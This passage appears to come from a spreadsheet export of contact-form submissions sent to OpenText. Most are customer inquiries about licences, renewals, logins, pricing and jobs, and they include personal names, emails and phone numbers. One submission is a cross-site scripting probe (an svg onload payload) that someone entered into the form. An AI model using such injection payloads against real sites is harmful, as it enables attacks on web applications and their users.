_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
_x000D_
_x000D_
Almost there!_x000D_
_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us."_x000D_
_x000D_
Please do the needful. _x000D_
_x000D_
Thanks,_x000D_
Mukul Dhanokar</t>
  </si>
  <si>
    <t>Remove from your site</t>
  </si>
  <si>
    <t>EDI Set up/_x000D_
Please advise</t>
  </si>
  <si>
    <t>Previously contacting PGSBilling@tmr3.com have been unsuccessful. Request for W-9 for Open Text required to remit monthly bill payment on account 858479.  Unable to pay charges without this document.</t>
  </si>
  <si>
    <t>Hello Team opentext I found a vulnerability on your search panel But it depended on any third party i think ? _x000D_
_x000D_
Contact me on my email for Report The vulnerability _x000D_
_x000D_
Thank You</t>
  </si>
  <si>
    <t>In reference to OTCS Ticket 3980332 - the ticket has been open for some time and is a current blocker that is affecting our delivery to a customer. There has been some research done it but am hoping for an update to a resolution or if this can be escalated to have addressed and resolved. Let me know if there are any questions.</t>
  </si>
  <si>
    <t>'"&gt;&lt;svg onload=prompt()&gt;</t>
  </si>
  <si>
    <t>Unable to split file within Rightfax to multiples files. It allow the creation of one file. I need to split some files from pages 1-8, 9-16, 17-24, 25-32, etc. When entering that info in split function. It only splits the first pages.</t>
  </si>
  <si>
    <t xml:space="preserve">EnCase® V7 Enterprise NAS_x000D_
Examiner/SAFE Electronic_x000D_
Serial Number: X100008005011_x000D_
_x000D_
I've been attempting to renew the above, which expires November 3, 2018; however, despite contacting all of your North America resellers, along with all CA resellers, and several IT contacts, not a single one has been able to provide a quote at this time. I've been sending out Cost Tables since early September and have been told that reps have been unable to receive cost information. I've contacted Forensic Store, Inc, HTCI EDAS FOX, TRITECH FORENSICS, Advanced Technical Solutions, Inc., Computer Forensics, Iconic Business, Granite Data Solutions, Allied Network Solutions, Ace Computers, Digital Intelligence, Forensic PC, Silicon Forensics, Lyme Computer Systems, H-11 Digital Forensics, LLC, and Silicon Forensics, and every single one has stated that they will either 1) not bid, 2) cannot get the information they need to bid, or 3) have not responded. I need this procured this week, and none of your resellers are assisting me. _x000D_
I need one (1) EnCase® V7 Enterprise NAS_x000D_
Examiner/SAFE Electronic_x000D_
Serial Number: X100008005011_x000D_
Expires: November 3, 2018_x000D_
(One-Year Support)_x000D_
Part Number: 310301010_x000D_
</t>
  </si>
  <si>
    <t>EnCase renewal pricing - please advise.</t>
  </si>
  <si>
    <t>We are in the process of investigating a new paperless solution for our legal department.  Would it be possible to have your terms and conditions forwarded to my attention to give us a flavor of considerations and requirements.  A response would be greatly appreciated by end of day tomorrow (Oct 30).  Thank you in advance for your assistance._x000D_
Lora</t>
  </si>
  <si>
    <t>We have the RKYV document management system running on Oracle EE - we would like to know if we can migrate it to Oracle SE2</t>
  </si>
  <si>
    <t>We are currently running Alchemy Release 9.0 (Build 300.130).  We would like to find out what is the current version of this product or has it been replaced by something else? _x000D_
 What is the road map for this product?  Is there a cloud replacement for it available?  Any info you can provide on the current version of Alchemy (or whatever fills that space in your portfolio currently), we would greatly appreciate it.  _x000D_
_x000D_
Thanks,_x000D_
Geoff</t>
  </si>
  <si>
    <t>Will you have any version of gupta report for free??? please contact by email.</t>
  </si>
  <si>
    <t>I would like more information about OpenText Capture Cloud, for example, methodolegy, sales information, how can we included this service in our proposal,...._x000D_
_x000D_
Thank you very much and best regards,_x000D_
_x000D_
Mónica</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to request an access to your portal enable to for me to login.  _x000D_
Thank you in advance for your prompt response. _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
We need a partner of Open text in colombia to have a exploration meeting, to review the product._x000D_
Thank You_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
    Is opentext open source and available on github to download or is there a developer license to implement reference model._x000D_
Thanks,_x000D_
Ankush Singal </t>
  </si>
  <si>
    <t>Hi!_x000D_
Mailtec is a Printing &amp; Finishing company from Portugal, an associated company from CTT (Postal company)._x000D_
_x000D_
I’m Izidro Sousa and I’m responsible for the development department of the company._x000D_
_x000D_
We are interested in start using OpenText CCE (former StreamServe) and I would like you to send me further information about this product, including:_x000D_
-	product features;_x000D_
-	Licensing: _x000D_
o	price for acquisition;_x000D_
o	price for maintenance;_x000D_
-	price for training of 2 or 3 persons. _x000D_
-	Location of technical support for Portugal;_x000D_
-	Location of commercial support for Portugal_x000D_
_x000D_
Thank you in advance.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je souhaite obtenir des informations sur l'utilisation légale du connecteur SAP fournit avec Integration Center. _x000D_
Notamment, sur la possibilité de définir des connections SAP vers plusieurs serveurs. J'aimerai aussi planifier la migration d'Integration Center 8.2 vers la dernière version._x000D_
Pouvez vous me contacter ou me fournir les documentations qui pourront me renseigner ?_x000D_
_x000D_
Merci._x000D_
Emmanuel FESTA_x000D_
Interforum (Ivry sur Seine).</t>
  </si>
  <si>
    <t>I am the registered user of 26 Encase licences (My company is the Royal Dutch Militairy Police (KMAR)).  I have to contact you, because i think that i need a support account so that i can download the sms cert for these 26 licenses and also can download the new versions of Encase.</t>
  </si>
  <si>
    <t>Please send me a W9 form for our Finance office for our invoice 900797315._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>to find out about AGA opentext connector - the api - can it be invoked through tools like qualiware. Please contact me by email as I am not in my office (at client's site)</t>
  </si>
  <si>
    <t>I've attempted to apply to the HRBP position / Waterloo -- for some reason I cannot login / request for password wasn't received (not in junk email) -- if someone would advise if my resume was received.  Thank you in advance for your assistance</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We currently have the rightfax server at our location. I was wondering if we can purchase the rightfax support for the next year. Please contact me._x000D_
_x000D_
Thank you so much!_x000D_
_x000D_
Ken</t>
  </si>
  <si>
    <t>how can I exclude certain terms from a search in Recommind?  thx</t>
  </si>
  <si>
    <t>Hello, We currently have Open Text HostExplorer version V15,0,0,172._x000D_
The version we need is V15,0,3,319._x000D_
How do we upgrade to this version?_x000D_
Thanks._x000D_
Stefan</t>
  </si>
  <si>
    <t>Informações sobre o formato de transmissão B2B ebXML.</t>
  </si>
  <si>
    <t>Technical question, on porting of geographic number to RightFax Connect (hybrid) solution.</t>
  </si>
  <si>
    <t>I would like to discuss upgrade options in our current RightFax environment.</t>
  </si>
  <si>
    <t>Bonjour_x000D_
Je suis Sales Manager chez Hasbro France et en charge d'un projet Européen de développement d'une nouvelle solution pour prise de commande direct B to B. Vous travaillez deja beaucoup avec Hasbro UK et j'aurais pouvoir aimé echanger rapidement avec vous sur ce sujet. Pouvez-vous me recontacter rapidement_x000D_
merci_x000D_
Mr SAMUEL</t>
  </si>
  <si>
    <t>We are needing to upgrade to a newer version before the end of the year. With that being said we were also looking to move the server to a 2016 server because that is something else we will need to accomplish. What do I need to do with you guys to get this up and working in tandem for a short period of time to test and verify that the new server is working and also is there documentation for migration available?</t>
  </si>
  <si>
    <t>I have created a user (for Online Support Resources) to be able to see the tickets logged for our company (via My Support) but I have no access. I always receive the message that I sitill have to confirm my registration, even though I have done that already (several times). _x000D_
Could you please make sure that I am able to follow up the tickets logged for FARYS at OpenText? _x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Awaiting response from the recruting team on application for Director-HR Shared Services. </t>
  </si>
  <si>
    <t xml:space="preserve">We have received a proposal in response to a Translation Service Request for Standing Offer from Alex Chan of Opentext in Montreal. When the list board of directors was submitted, our security office seaked clarification because it was different names than what was on the current list. When I sent an email to Mr. Chan, I received an error message "bounce back" that the email was incorrect._x000D_
1) please confirm that M. Alex Chan has signing authority on behalf of OpenText_x000D_
2) please provide updated email information for M. Chan._x000D_
_x000D_
Thank you,_x000D_
Yves Henry_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello. My name is Gevorg, I am an administrator at ITSB LLC which is located in Armenia. We are interested in buying EnCase® Forensic 8. We are trying to reach you for about 1 week and not getting any response. Please contact us to discuss everything.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hello,_x000D_
_x000D_
My name is Altyn. I represent a large IT company that operates in Kazakhstan and Russia that mostly works with corporate clients such as Agip, Sinopec, NCOC, etc.  We would like to request a quote and develop further relations._x000D_
_x000D_
Now our client is the NCOC N.V. (North Caspian Operating Company N.V.) has announced a Tender for the supply of software._x000D_
According to this Tenderer over the next three years it is planned to purchase Licenses and Maintenance on the following products:_x000D_
_x000D_
OpenText extended ECM for SAP solutions	Q-ty 2100_x000D_
OpenText Brava View and Annotate	Q-ty	300_x000D_
OpenText Web Reports	Q-ty 1500_x000D_
OpenText Automatic Document Numbering (ADN)	Q-ty 100_x000D_
OpenText Transmittal Management Q-ty	100_x000D_
OpenText Capture Center (450K pages per year)	Q-ty 1_x000D_
_x000D_
Could you provide a price quote for these items? Is it possible acquire a License and Maintenance directly from you?_x000D_
_x000D_
Is it possible to sign a contract with you to supply your software solutions? Our company has been in the IT market over 25 years and always looking for an opportunity to implement high quality products into the market. Would you be able to have a call today or tomorrow to discuss possible collaboration?_x000D_
_x000D_
Looking forward to your reply!_x000D_
_x000D_
 _x000D_
Warmest regards,_x000D_
Altyn_x000D_
</t>
  </si>
  <si>
    <t>We would like to know your partners/reseller details in Dubai, United Arab Emirates</t>
  </si>
  <si>
    <t>Can't create my account the form does not work :-(_x000D_
Can you create it for me I want to register my Encase Dongle ?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Safran has buy the EnCase EndPoint Security &amp; Investigator product and I cannot access to the portail since it change from guidance to opentext._x000D_
Can you please restore my access ?_x000D_
_x000D_
Regards,_x000D_
Nicolas LOUIS</t>
  </si>
  <si>
    <t>For EDI Integration platform to work with various existing products in our 4PL ecosystem which needs to be integrated with our Control Tower.</t>
  </si>
  <si>
    <t>Retail loan lending solution</t>
  </si>
  <si>
    <t>Hi!_x000D_
How much of the content will be Documentum at the Enterprise world in Vienna? Will there be sufficient of interest during both two days for Documentum users?_x000D_
Regards,_x000D_
Petrine</t>
  </si>
  <si>
    <t xml:space="preserve">We (Leica Geosystems) are doing EDI Business with CNH in USA._x000D_
CNH is using OpenText services for the OFTP2 DataTransfer of the EDI data._x000D_
Until now I have received a plain text email message when an EDI has failed (Action Required..., sender: psupp10@mail1.dcts.us.gxs.com)_x000D_
This has been changed and now there is a table with some technical data and with a link to more details (sender: donotreply_alertcommandcenter@opentext.com)._x000D_
When trying to follow that link, it says I need to login to OpenText Trading Grid Online. _x000D_
Where I do not have credentials._x000D_
When trying to create an account there, it says I need to have an Invitation Code to create an account there_x000D_
--&gt; Which I do not have._x000D_
Next chapter:_x000D_
I tried to inform you via general Support site "support . opentext . com" about this fact above._x000D_
It tells me I need to logon to OpenText Connect._x000D_
So I tried to create an account there for my email address harald.weber@leica-geosystems.com, which worked until the final step which failed somehow (server error 505)._x000D_
So - I did not know whether my account has been created or not._x000D_
Seems to be something in the middle._x000D_
1. I was not able to login with my e-mail address and correct PW (wrong credentials)_x000D_
2. I was not able to create a new account with my e-mail address (e-mail address already used)_x000D_
3. I tried to use "Forgot password", got your mail, entered new PW twice, but the update failed again (error updating password)_x000D_
_x000D_
So - I am now not really happy spending so much time when I just wanted to check the EDI transmission failure._x000D_
_x000D_
Can you please help me ?_x000D_
Probably best with sendind me an invitation code for OpenText Trading Grid Online, so I can directly check the failure details by following the link in your mail._x000D_
_x000D_
Thanks_x000D_
Harald Weber_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Require Encase Forensic Analysis Tool &amp; Encase portable, Black Bag MAC OS imaging and analysis tool and other tools for cyber crime analyses._x000D_
required the price and business terms for India._x000D_
</t>
  </si>
  <si>
    <t>Ygdukh gddhh ghv</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
I am looking for the prices to quote my customer for the below product._x000D_
_x000D_
Upgrade &amp; Maintenances (One Year) for open text. document management system edocs. edition . With ArcMate Capture for (1000000) licenses for scaned documents.</t>
  </si>
  <si>
    <t>Good Day! _x000D_
Greetings from Tradohub(DOT)com, India’s first E-Distributor of Industrial goods._x000D_
Our business primarily focuses on aggregate &amp; supply Industrial raw materials to Indian SMBs from global manufacturers through cross border online platform – Tradohub(DOT)com. Tradohub is a business model innovation and product innovation company. It changed traditional practices of procurement and supply chain. _x000D_
Tradohub’s main motive was to remove middlemen from SME raw materials procurement chain by leveraging technology, volume aggregation and global sourcing capabilities and thus improve competitiveness of SMEs so that they can compete with large players globally. We are growing at the rate of 5X, dealing with 2000 Indian SMBs, 250 international suppliers from 55 countries and 220 products across 5 different industrial sectors of Food &amp; Agro, Polymers, Industrial chemicals, Metals and Pharma. _x000D_
To further innovate and leverage technology, we were looking at Electronic Data Interchange (EDI) utilization. Thus, we would like to have brief idea about how EDI could be proven revolutionary in our industry._x000D_
We would also like to inquire about EDI Implementation, Integration in existing solutions and similar case studies._x000D_
Hope for prompt revert and Thanks for your time._x000D_
Best Regards,</t>
  </si>
  <si>
    <t>Enquiry about OCR solution</t>
  </si>
  <si>
    <t>Hi,_x000D_
I have a client who has a user currently using the Brava! Desktop software. We wish to move this user to a new computer and take the software with it. However, this version of software predates Brava! being a part of Opentext so is not under the clients current opentext account. what information do you need me to provide you so that we can migrate the software onto the new computer._x000D_
Regards,_x000D_
Chris</t>
  </si>
  <si>
    <t>Applying for Director, Enterprise Business Systems (IT)</t>
  </si>
  <si>
    <t>I need to know what the oldest release of Exstream is that is compatible with z/OS 2.3 and what/if there is an EOS date for it. Thank you!</t>
  </si>
  <si>
    <t>I wanted to see when my renewal is up. Number is 15-0416-7022.</t>
  </si>
  <si>
    <t>asap</t>
  </si>
  <si>
    <t xml:space="preserve">Madame, Monsieur,_x000D_
_x000D_
NOTRE ECHANGE DOIT RESTER SOUS LE CONVERT DE LA CONFIDENTIALITE_x000D_
_x000D_
Suite à ma prise de fonction mi-septembre 2018 (pour le poste de Directeur IT &amp; OT) chez la Société YNSECT, je suis en train d’identifier les gaps qu’il faut mettre en place dans notre Entreprise._x000D_
_x000D_
La mise en place d’un Outil EDMS de qualité et performent fait partie de ces gaps à mettre en place._x000D_
Dans ce but j’ai besoin de disposer de devis pour pouvoir provisionner le coût (précis à +/- 20%) d’un tel Projet sur mon Budget 2019 (que je suis en train de préparer)._x000D_
_x000D_
Je vous prie de bien vouloir trouver ci-dessous le référentiel dans lequel se trouvera ce Projet EDMS et donc votre devis._x000D_
_x000D_
NOTRE REFERENTIEL :_x000D_
•	Notre effectif actuel est d’une centaine de personnes,_x000D_
•	Nous sommes actuellement répartis sur 2 Sites [notre siège sur Évry (environ 70 personnes) et notre 1ière Usine proche de Dole dans le Juras (environ 30 personnes)],_x000D_
•	Nous disposons de beaucoup d’applicatifs en mode SAAS [Outlook (OVH), …],_x000D_
•	Nous sommes en forte croissance et nous embauchons à tour de bras,_x000D_
•	Nos perspectives à cours termes :_x000D_
o	Un Projet de mise en place de notre ERP qui débutera début 2019 (l’ERP sera hébergé dans un Cloud Privé ou Public),_x000D_
o	Un Projet de mise en place de notre MES (Manufacturing Execution System) qui débutera début 2019 (le matériel du MES sera installé à cheval sur notre LAN Bureautique &amp; LAN Industriel de notre Usine de Dole)),_x000D_
o	Notre 2ième Usine (de taille XXL) est prévue pour sortir de terre en 2020 (où notre ERP et notre MES y seront déployé) -&gt; Une centaine de personnes travaillera sur ce Site Indusdriel,_x000D_
o	…_x000D_
_x000D_
CETTE DEMANDE DE DEVIS POUR LA MISE EN PLACE D’UN SYSTEME EDMS POUR NOTRE ENTREPRISE PORTE SUR :_x000D_
1.	L’ensemble des Documents des Départements de notre Entreprise et de nos Usines:_x000D_
a.	Département Finance,_x000D_
b.	Département RH,_x000D_
c.	Département Engineering et la Gestion des documents Projets Engineering,_x000D_
d.	Département(s) Production &amp; Manufacturing,_x000D_
e.	</t>
  </si>
  <si>
    <t>Please can you stop your ticketing system being brain dead and creating a ticket email storm with another ticketing system, we are receiving loads of email from a rubbish email from M&amp;S sent to your ticketing system and CCed to 50 other people._x000D_
_x000D_
eg:_x000D_
_x000D_
1-3454653126, Created for: Case CS0134306 has been Updated_x000D_
prod-services@opentext.com</t>
  </si>
  <si>
    <t>I can not log -in in the fax machine.</t>
  </si>
  <si>
    <t>I registered with my e/mail and password and it does not recognize me.  I can not sign in</t>
  </si>
  <si>
    <t>Questions about your ECM</t>
  </si>
  <si>
    <t>Hello.._x000D_
I have a many of questions about your  (ECM) _x000D_
I hope you answered it and sent it back to me as soon as possible_x000D_
Thank you_x000D_
“I apologize for my English” _x000D_
*Fatimah almohaysin from KAU _x000D_
_x000D_
-	Type of purchase plan (commercial - one-time license – license(?_x000D_
-	Ability to modify the system according to the need of the institution ?_x000D_
-	There are no restrictions to modify the system?_x000D_
-	Is there a remote host?_x000D_
-	Support for scripting languages in server side include php. JSB?_x000D_
-	Support for SQL-compliant standard databases with ODCB interface_x000D_
Include MySQL, Microsoft?_x000D_
-	The system supports exporting all its data to CDs ?_x000D_
-	Ability to transfer content (content transfer and export of all content and hosting settings elsewhere)?_x000D_
-	Support backups ? _x000D_
-	Support the ability to work offline?_x000D_
-	To comply with these standards (Z39.50-marc-Dublin Core-SIP / NCIP-Open URL-SRU / W) ? _x000D_
-	Compatible with these protocols (TCP / IP-xml-HTTP-OAI-PMH-CSS) ? _x000D_
-	Do you support xsl ? _x000D_
-	There are no additional costs to run the system?_x000D_
-	Is there free technical support for the system?_x000D_
-	Is there technical support for the system?_x000D_
-	Is free training offered on the system?_x000D_
-	Does the system require special equipment and expensive equipment?_x000D_
-	The recipient interface is multi-lingual ?_x000D_
-	Provides the possibility to customize the user interface according to its needs?_x000D_
-	Ability to change or add user data easily?_x000D_
-	Allows multi-level drop-down menus ?_x000D_
-	Allows simultaneous operation of more than one client ?_x000D_
-	Lets you change the language of the system interface without having to log out and re-login ?_x000D_
-	Ability to format text?_x000D_
-	Are there limitations in the amount of text and the size of the document being uploaded?_x000D_
-	Rising download of compressed files?_x000D_
-	Ability to handle files with non-changeable formats, such as PDF and TIFF?_x000D_
-	Supports simple and complex entities such as a picture inside an HTML file?_x000D_
-	Multi-user support ?_x000D_
-	Ability to manage comments ?_x000D_
-</t>
  </si>
  <si>
    <t>Info about  how to file share.  It seems your acquisition of Hightail has made sharing video files a thing of the past.</t>
  </si>
  <si>
    <t>Career Growth</t>
  </si>
  <si>
    <t>Could you please provide access to MySupport access.</t>
  </si>
  <si>
    <t xml:space="preserve">I want to work </t>
  </si>
  <si>
    <t>Hello and Good Day_x000D_
 _x000D_
I am Max,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t>
  </si>
  <si>
    <t>Documentum demo</t>
  </si>
  <si>
    <t>Need to order 3 licenses for LicHostExplorer MPML14.  Please let me know the pricing.  _x000D_
Ann</t>
  </si>
  <si>
    <t xml:space="preserve">Do you have open source version of data discovery/analytics version of opentext available on github to run on docker or a developer license available for the same product for the reference model we are working on for building a machine learning API_x000D_
</t>
  </si>
  <si>
    <t>I have a client that is looking at moving to a faxing server.  Need to talk to someone about a quote.  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Good day,_x000D_
Since  30/10/2018 is the last day for SMS  to our Customer_x000D_
(Customer data/ End User Information:   10435293   Forensic Science Center of   Lithuania)_x000D_
I am  looking for Support team which is responsible to activate SMS Renewal and send *.cert files._x000D_
_x000D_
Please clarify, do you receive wire transfer (transfer notification attached) is made 16.October?_x000D_
I suppose, this should be made in 2 days (between 2 banks in EU) and already done. _x000D_
Payment made according to _x000D_
Invoice_x000D_
Billing Doc. #: 9000798074_x000D_
Invoice Date : 2018-10-12_x000D_
Due Date: 2018-11-11_x000D_
Renewal Number: RC384362_x000D_
_x000D_
Looking for urgent answer_x000D_
_x000D_
With regards,_x000D_
Robert Sostakovskij_x000D_
B.G.M. sales chief manager_x000D_
_x000D_
B.G.M. UAB_x000D_
M.K. Ciurlionio st. 17 -1_x000D_
Vilnius_x000D_
LT-03104 Lithuania_x000D_
_x000D_
Phone +370 5 2163530_x000D_
Mob.   +370 687 16243_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am interested in the capability of checking the quality of scanned documents, classifying and adding metadata at the file and document level. Medical and legal markets primarily.</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to discuss the Capital Projects solution as we look towards an end to end solution for construction management. </t>
  </si>
  <si>
    <t>We are Xerox Sales agents, and I am looking for someone I can speak with about RightFax cloud solution.</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are looking to get set up with a Dedicated Server or VPS today with a /27._x000D_
It is to mail, but it's all compliant._x000D_
Can we get set up with you guys?</t>
  </si>
  <si>
    <t>B2b integration withEDI</t>
  </si>
  <si>
    <t>I have a client that has interest in the Documentum product.</t>
  </si>
  <si>
    <t>We have been looking for a way to buy the Open Text Stream Serve licnese for RFID integrations on label printers. I hope you can help me ?</t>
  </si>
  <si>
    <t>As a long time RightFax user (ESU080065), we are interested in discussing RightFax Cloud or RightFax Connect.  Can someone please contact us to discuss the options.</t>
  </si>
  <si>
    <t>Hello, I am trying have a Sales Rep contact me to provide me with an email address so that I can send a request for RFQ's/Solicitations for products?</t>
  </si>
  <si>
    <t>2019 enterprise world conference. I received an email for pre-registration however I am not able to click on the links in the email so I went to you website to see what the event entails but there is no information available. Therefore I am reaching out to see if someone could give me a call or send me some information about the conference and pre-conference classes._x000D_
_x000D_
Thank you!_x000D_
Melissa</t>
  </si>
  <si>
    <t>首席阿里巴巴zzzzzzzzz</t>
  </si>
  <si>
    <t>I'm trying to access a page on your website, /knowledge/cs.dll but I keep being told my email address hasn't been confirmed even though I've gotten several "Registration Confirmation" emails and clicked on the "Confirm Registration" link in the email. Is your website broken or is this site only available to paid customers?</t>
  </si>
  <si>
    <t>I have a charge for $14.20 on my credit card from 10/23/2018. It appears to reference number 23100357. I have never heard of "open text". How do I find out what this charge was for?</t>
  </si>
  <si>
    <t>document saying checked out will let me open but won't go out of checked out status always has red check mark on the document the check in option is grayed out.</t>
  </si>
  <si>
    <t>Greeting Sir,_x000D_
Appreciate your support. Helping us to get a quotation for onsite FORENSIC training in Riyadh - Saudi Arabia .. Or advise contact whom we can ask for it . ASAP_x000D_
_x000D_
_x000D_
Best Regards.</t>
  </si>
  <si>
    <t>Good morning, good afternoon and good evening,_x000D_
_x000D_
After almost four weeks after I applied as a Senior Project Manager for the office in Munich DE, I would appreciate your feedback. Thank you._x000D_
_x000D_
Best regards,_x000D_
Laurentiu Maniu</t>
  </si>
  <si>
    <t>Приветствую Вас, меня зовут Николай. _x000D_
Моя профессия: интернет-маркетолог. _x000D_
Работаю в сфере интернет-маркетинга уже более 7 лет. _x000D_
А точнее: _x000D_
 _x000D_
- 4.6 года я занимаюсь Seo продвижением сайтов и прекрасно понимаю сколько факторов влияют на рост трафика и позиций в поисковой системе Яндекс и Google. Имею опыт продвижения высоко-конкурентных коммерческих сайтов по региону Москва и МО. Это пластиковые окна и сайт агентств по недвижимости. _x000D_
 _x000D_
- 2.1 года занимаюсь привлечение трафика путём настроек контекстной рекламы в Яндекс.Директ _x000D_
 _x000D_
- Пол года занимаюсь разработкой одностраничников (Landing Page) - в связи с чем не высокая цена работы. _x000D_
 _x000D_
Что я могу сделать для Вас: _x000D_
 _x000D_
1. Настроить контекстную рекламу Я.Директ _x000D_
- Сроки разработки рекламных компаний: 3-5 дней; _x000D_
- Стоимость 3500 руб. _x000D_
 _x000D_
2. Внутренняя оптимизация сайтов (SEO) _x000D_
- Сбор семантического ядра с 8 типами данных, в том числе конкурентность запроса. _x000D_
- Кластеризация семантического ядра - тоесть распределение ключевых запросов по страницам сайта _x000D_
- Внутренняя оптимизация сайта целиком или постраничный (Мета данные + переработка текстов) _x000D_
- Аудит всего сайта или аудит конкретных страниц на релевантность страницы под ключевые запросы. _x000D_
 _x000D_
3. Разработка Landing Page _x000D_
- Сроки: 7 дней _x000D_
- Цена: 6500 руб _x000D_
 _x000D_
Смотрите. _x000D_
У вас наверняка есть и будут вопросы по каким либо направлениям, будь это Seo, контекстная реклама или создание сайта, Я всегда готов оказать Вам бесплатные консультации по вашим вопросам: _x000D_
 _x000D_
Телефон: +89652200882 - Николай _x000D_
Почта: okseoru@gmail.com</t>
  </si>
  <si>
    <t>Bonjour je suis a la recherche d information afin de pouvoir dematerialiser des documents depuis un équipement HP multifonctions vers Livelink._x000D_
Votre lien vers "Open text imaging  Enterprise scan ..." ne fonctione pas opentext_enterprise_content_management_ecm_Enterprise_Scan_product_overview.pdf . Can t reach this page._x000D_
_x000D_
Pourriez vous me dire si un simple scan to dossier partagé (SMB ou FTP) suffise a ensuite utiliser vos outils afin de classer ces documents, ou existe t il des connecteurs afin de router directement depuis un equipement multifonction les documents dans Livelink. ou vers votre solution "Open text imaging  Enterprise scan "   ?_x000D_
Merci de votre retour._x000D_
_x000D_
Cordialement</t>
  </si>
  <si>
    <t>Hi Hightail,_x000D_
_x000D_
I'm Karina from GanttPRO. I'm happy to say that Hightail is included in the list "40+ Best Online Collaboration Tools for Teams in 2018" on GanttPRO blog._x000D_
If you like the post, you can share it on social media._x000D_
_x000D_
Do want a direct do-follow link in the text?_x000D_
_x000D_
Regards,_x000D_
Karina,_x000D_
Marketing manager at GanttPRO</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team,_x000D_
Myself Vivek from Robert Bosch India and I would need your assistance on my below query._x000D_
_x000D_
We are in a initial stage of implementing OpenText StramServe and we would need to know more details about the Opentext Streamserve setup part and configuration part. We searched over internet and didn't get any useful information._x000D_
_x000D_
So we required your assistance to get a free trial version and installation and configuration documents for our first stage of learning on this tools.._x000D_
_x000D_
Regards_x000D_
Vivek_x000D_
</t>
  </si>
  <si>
    <t>Hello, I have tried to Setup an Support account at GXS but get an error, the account is not able for this._x000D_
The reason for my Support case is that we do use ISDN OFTP to Access GXS, at the Moment we are not able to use TCP/IP so I tried to use the given ISDN from you Information email:•	+441483765040 (dial number for Information Exchange Odette File Transfer Protocol)_x000D_
I can call it but get an error Partner not known._x000D_
Our Mailbox at GXS is AMR46233_x000D_
Can you also let me know how Long the old German ISDN will working, because I am on vacation for two weeks._x000D_
Thank you</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir beginnen demnächst mit einem SAP ILM Projekt und benötigen außerdem ein neues Archivsystem. In diesem Zusammenhang interessieren wir uns für ihre Archivierungslösungen. _x000D_
Für eine Vorauswahl geeigneter Produkte und Anbieter benötigen wir Informationen zu folgenden Themen:_x000D_
- Unterstützung von SAP ADK und SAP ILM_x000D_
- Unterstützung von SAP ECC 6.0 und S4HANA_x000D_
- Welche Archiv- und Storage-Systeme werden unterstützt? (Bevorzugt werden DELL EMC Data Domain und NetApp)_x000D_
- Unterstützung der Archivmigration (von IXOS + EMC Centera)_x000D_
Über eine Kontaktaufnahme in der nächsten Woche würde ich mich freuen._x000D_
Mit freundlichen Grüßen_x000D_
Mario List</t>
  </si>
  <si>
    <t>EDAX150 &amp; EDAX200 training in Washington DC for Q4 2018 or in Reading UK Q4 2018.</t>
  </si>
  <si>
    <t>Partner that need to get access partner portal including deal desk</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
durch eine Firmenübernahme müssen wir eine Gupta Datenbank neu lizenzieren. Wir möchten auch Programme weiter/ neu entwickeln._x000D_
Können Sie mir hierzu einen Preis nennen?_x000D_
_x000D_
Viele Grüße_x000D_
Ralf Reuel</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Madam, dear Sir,_x000D_
I would like to submit my candidacy for an appointment in your company for position - Russian Speaking Senior Legal Counsel in Paris ._x000D_
I’ve studied Law in Russia. I’ve got two master degrees, respectively at the Kurgan State University (Master in Civil law with honors) and Saint-Petersburg State University (Master in Fiscal law). I’ve worked for 12 years in the Morion group of Companies (Saint-Petersburg), first, as a lawyer, then, as the head of the legal department._x000D_
Recently, I decided to develop my education and thus I followed a master program in economic law at the ULB (Université Libre de Bruxelles) in Brussels, Belgium. My master thesis was in fiscal comparative law (Belgium, Netherlands, France, Russia) with the title «Ways to optimize the tax regime for taxpayers resident in Belgium, owners of real estate abroad»._x000D_
I am looking for a job enabling me to exploit and develop my professional experience and language skills. Your company is one of the leaders in my sphere of interest._x000D_
People who know me describe me as determined, resourceful, applied and efficient. I would be honored and thrilled to become part of your staff._x000D_
Yours sincerely,_x000D_
Daria Bolshakova _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I've been working in digital forensics for about 4 years. I have the following certifications: Sans GCFE, Iacis BCFE, IISFA CIFI. I've never used your product. from December 10th to 14th I will attend the "Encase Advanced Internet Examinations" course (DFIR350) organized by OLAF in Tallinn._x000D_
Is there an Encase certification related to the DFIR350 course? Which is ?_x000D_
since I have never worked with the Encase software, and since the DFIR350 is an advanced course, which has the DF210 prerequisite, do you have any official texts related to the DF210 and DFIR350 course? Is it possible to have a trial license of your software?_x000D_
_x000D_
Thank you_x000D_
</t>
  </si>
  <si>
    <t>WebServerError trying to Login with your site OT connect; password reset did not cure the isssue.</t>
  </si>
  <si>
    <t>This is Kristine Ang, a FAS/Procurement Specialist from SM Retail, Inc, based in the Philippines. We are in the process of adapting an enterprise content management framework for the company’s processes and digitizing all of our documents and files to adapt to a paperless workplace. We would like to request for OpenText to provide us a contact person whom we may communicate with. I hope that the contact person is directly associated with OpenText. I'm looking forward to your immediate and favorable response.</t>
  </si>
  <si>
    <t xml:space="preserve">Request for clarification on, offline usage of Opentext Exstream tool </t>
  </si>
  <si>
    <t xml:space="preserve">I have an issue, I booked the EnCE test. I already make the payment. I didn't receive any credentials for phase one. I contact the department which sent me the invoice and I didn't get any response for more than a week.  I am very frustrated and upset. please help me._x000D_
I have an account using the same mail address and I used your portal to make the payment. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team , _x000D_
_x000D_
